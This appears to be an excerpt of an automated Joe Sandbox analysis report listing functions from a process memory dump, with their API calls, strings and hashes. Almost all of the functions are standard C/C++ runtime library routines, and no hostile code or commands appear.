Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
Instruction ID: db2ad771684fdcb292aaa67875e12770682da75cbc3d3b4da5605eed9bf873be
Opcode Fuzzy Hash: 52a8c07adecc82b62b68129d2385687b26cd17e8ecd339a0cde02f9c064b2de7
Instruction Fuzzy Hash: 00210A32A01214ABC7229B24DD81E9A7F68EF757A4F250125F95EA72D0D730ED01C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 001C5DAE Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
Instruction ID: f78acefc83a9afe0d9b1eb50952129b24de8b835c2eb3f4849f9e1c3e26ea2d3
Opcode Fuzzy Hash: c8c444a3d583a57202a54c526f8994900f9547a190c59887f7f5fccc61585539
Instruction Fuzzy Hash: FAB11474A04249EFDB15DFA8C881FAEBBB6BF69304F14415CF501A7292C774E981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B4BF9 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001B4BF0,001B179B), ref: 001B4C07
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B4C15
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B4C2E
SetLastError.KERNEL32(00000000,?,001B4BF0,001B179B), ref: 001B4C80

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 36eeb5be34ff18fb792468254b23e455bf5e41409b9fc483c26eb7605454bd60
Instruction ID: ba16a55b82a9a2abf0a1508212e04ff7c75344c52f7489c720e5b6d35322bcb3
Opcode Fuzzy Hash: 36eeb5be34ff18fb792468254b23e455bf5e41409b9fc483c26eb7605454bd60
Instruction Fuzzy Hash: A801DF3220B7155FA725ABB4BCD9AE73F54EF21BB8760833AF524415E2EF214C819181

Uniqueness

Uniqueness Score: -1.00%

Function 001AE199 Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001AE1A6
int.LIBCPMT ref: 001AE1B9

Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0

std::locale::_Getfacet.LIBCPMT ref: 001AE1C2
std::_Facet_Register.LIBCPMT ref: 001AE1F9
std::_Lockit::~_Lockit.LIBCPMT ref: 001AE202
__CxxThrowException@8.LIBVCRUNTIME ref: 001AE22A

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
Instruction ID: 4a8f0e804a7bacdcfb993114f686648b2a1c69d1ba6121702cb4060c7a90c237
Opcode Fuzzy Hash: 7144f08d152b9b56cee08389076698ff1f1d36519c41bbe7e5e1342f9d17be28
Instruction Fuzzy Hash: CD11C43A90012CABCF04EFD4D9459EE7BF9AF65724F11015AE905A7291DF709E05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001ADEAE Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001ADEBB
int.LIBCPMT ref: 001ADECE

Part of subcall function 001A1385: std::_Lockit::_Lockit.LIBCPMT ref: 001A1396
Part of subcall function 001A1385: std::_Lockit::~_Lockit.LIBCPMT ref: 001A13B0

std::locale::_Getfacet.LIBCPMT ref: 001ADED7
std::_Facet_Register.LIBCPMT ref: 001ADF0E
std::_Lockit::~_Lockit.LIBCPMT ref: 001ADF17
__CxxThrowException@8.LIBVCRUNTIME ref: 001ADF3F

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
Instruction ID: 3bef55255a0badb284da0e689091e42786a6a05b5f2b8ad861d6c4ab2ee67679
Opcode Fuzzy Hash: ba717c2975f2b6350b19acad1dc2333e75dbe73a45509afaf958305c57a403ae
Instruction Fuzzy Hash: 5311043A900518ABCF04EFE8D8059AEB7B8AF66724F11415AF906A7291DF709E05CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001A1878 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 001A18D1
std::system_error::system_error.LIBCPMT ref: 001A18E0

Part of subcall function 001A16A2: __Init_thread_footer.LIBCMT ref: 001A1703

Strings

ios_base::eofbit set, xrefs: 001A18C6
ios_base::failbit set, xrefs: 001A18B9
ios_base::badbit set, xrefs: 001A1897

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Exception@8Init_thread_footerThrowstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1054456820-1866435925
Opcode ID: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
Instruction ID: df6193bed593758df005c03afe2e874a06b6c1738a9731931e3d57f68dc5dbb0
Opcode Fuzzy Hash: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
Instruction Fuzzy Hash: 06F0283D9403087EDB14BA95CC03FBA77AC9F12784F148019F845A6282C7B99805C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A1253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001A1260
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A1296

Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF11F
Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF143

std::exception::exception.LIBCONCRT ref: 001A12AF
__CxxThrowException@8.LIBVCRUNTIME ref: 001A12C4

Strings

bad locale name, xrefs: 001A12A7

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::exception
String ID: bad locale name
API String ID: 159601860-1405518554
Opcode ID: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
Instruction ID: 91b8b9fae90eedc6fb91db4b137552529f25807321ee44045def24db17a9d415
Opcode Fuzzy Hash: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
Instruction Fuzzy Hash: 89014475905744AEC720DFAAD481486FBE8BE293107908A6FE48AD3A11D770E504CB99

Uniqueness

Uniqueness Score: -1.00%

Function 001B816E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,297D850E,?,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81A3
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B81B5
FreeLibrary.KERNEL32(00000000,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81D7

Strings

CorExitProcess, xrefs: 001B81AD
mscoree.dll, xrefs: 001B819C

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
Instruction ID: e532f5418c696d94a282f301ee237c8bca330c09eb0827b9409a5d98d0de35ba
Opcode Fuzzy Hash: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
Instruction Fuzzy Hash: 23014B32904669AFDB129F54DC09FAEBBF8FB04B58F000629F811A26A0DB75D950CA91

Uniqueness

Uniqueness Score: -1.00%

Function 001BEBB4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001BEC39
__alloca_probe_16.LIBCMT ref: 001BED02
__freea.LIBCMT ref: 001BED69

Part of subcall function 001B7330: RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362

__freea.LIBCMT ref: 001BED7C
__freea.LIBCMT ref: 001BED89

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
Instruction ID: f9d85bfb9e06646ccfdcd3b39a780c9f3da7ec042ab7628b65f47fb4ecf41c2e
Opcode Fuzzy Hash: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
Instruction Fuzzy Hash: 2D51E172600246AFEB249FE0CC81EFB3AEAEF95720F15052CFC08D6150EBB0DC5196A0

Uniqueness

Uniqueness Score: -1.00%

Function 001A1C5A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 164COMMON

Download Yara Rule

APIs

Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1E44

Part of subcall function 001ACBFB: _memcmp.LIBVCRUNTIME ref: 001ACC63

Strings

<v>, xrefs: 001A1D52, 001A1D57, 001A1D60
<c r=, xrefs: 001A1CEB, 001A1CF2, 001A1CFB, 001A1DDC, 001A1DE1, 001A1DEA
</v>, xrefs: 001A1D6A, 001A1D71, 001A1D7A

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: H_prologIos_base_dtor_memcmpstd::ios_base::_
String ID: </v>$<c r=$<v>
API String ID: 2171099386-3488173955
Opcode ID: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
Instruction ID: 60ee7695180e59a9f5a63f25d3c4f94eb36793fd85ad22e897a6369376d493dd
Opcode Fuzzy Hash: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
Instruction Fuzzy Hash: 7751D3761083406ED314EB24DC86EAFBBE8EFD6354F004A2DF59697291DB709909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 001BB978 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(297D850E,00000000,00000000,?), ref: 001BB9DB

Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001BBC2D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001BBC73
GetLastError.KERNEL32 ref: 001BBD16

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
Instruction ID: e80f502c74f0e1009ec33310733f237df15c13417417044f101471337e295d32
Opcode Fuzzy Hash: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
Instruction Fuzzy Hash: A1D188B5D082489FCF15CFA8C8D0AEDBBB5FF09304F28452AE856EB651D770A942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C1462 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202

GetLastError.KERNEL32 ref: 001C14C6
__dosmaperr.LIBCMT ref: 001C14CD
GetLastError.KERNEL32(?,?,?,?), ref: 001C1507
__dosmaperr.LIBCMT ref: 001C150E

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
Instruction ID: 5879813038cc4f2048a93541e567ad74cee9b4672f6f6bc840ab0e42b4f351fe
Opcode Fuzzy Hash: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
Instruction Fuzzy Hash: D621C572640205BF9F24AF66CC81EABB7A9FF763A8711851CF91A97142D730EC40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001B7959 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
Instruction ID: c856b30029250c9a7dd7fa0c99d4f903c69e576394fe64e042bb281813c6158d
Opcode Fuzzy Hash: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
Instruction Fuzzy Hash: 0C21F631608205AFAB60AF76DC81DEFB7A9BFA13A87054914F919E75D1D730ED4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C2403 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001C240B

Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2443
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2463

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
Instruction ID: 3a3239c8a9f2ba4f11e1779af32997580afd65e1d2d599e5c131e8cc4b445be2
Opcode Fuzzy Hash: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
Instruction Fuzzy Hash: 8211D6B2A05219FF671A27719C8EEAF6D6CEEA93A83510028F501D1101FB74CD0181B1

Uniqueness

Uniqueness Score: -1.00%

Function 001B22C1 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001B22D8

Part of subcall function 001B2910: ___AdjustPointer.LIBCMT ref: 001B295A

_UnwindNestedFrames.LIBCMT ref: 001B22EF
___FrameUnwindToState.LIBVCRUNTIME ref: 001B2301
CallCatchBlock.LIBVCRUNTIME ref: 001B2325

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
Instruction ID: 579d02e0d58413cb68fcd450e2a6fa41b9a3ff32d82270c2bd18a260a69cea82
Opcode Fuzzy Hash: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
Instruction Fuzzy Hash: 54010832000109FBCF126F55CC01EEA3BBAFF58754F158154FD18A6121D736E9A5EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001C82B3 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000), ref: 001C82CA
GetLastError.KERNEL32(?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?,?,001BC344,00000000), ref: 001C82D6

Part of subcall function 001C829C: CloseHandle.KERNEL32(FFFFFFFE,001C82E6,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?), ref: 001C82AC

___initconout.LIBCMT ref: 001C82E6

Part of subcall function 001C825E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001C828D,001C5792,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C8271

WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C82FB

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
Instruction ID: 85cf91a034373ea966cda54712f98a31f23d5994b53b64c93483f0c9adbc9941
Opcode Fuzzy Hash: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
Instruction Fuzzy Hash: 62F03036003169BFCF221F91DC48E8A3F66FF28BE1B404014FA098A530CB32C861DB92

Uniqueness

Uniqueness Score: -1.00%

Function 001B75FD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001B768D

Strings

pow, xrefs: 001B7665, 001B7682

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
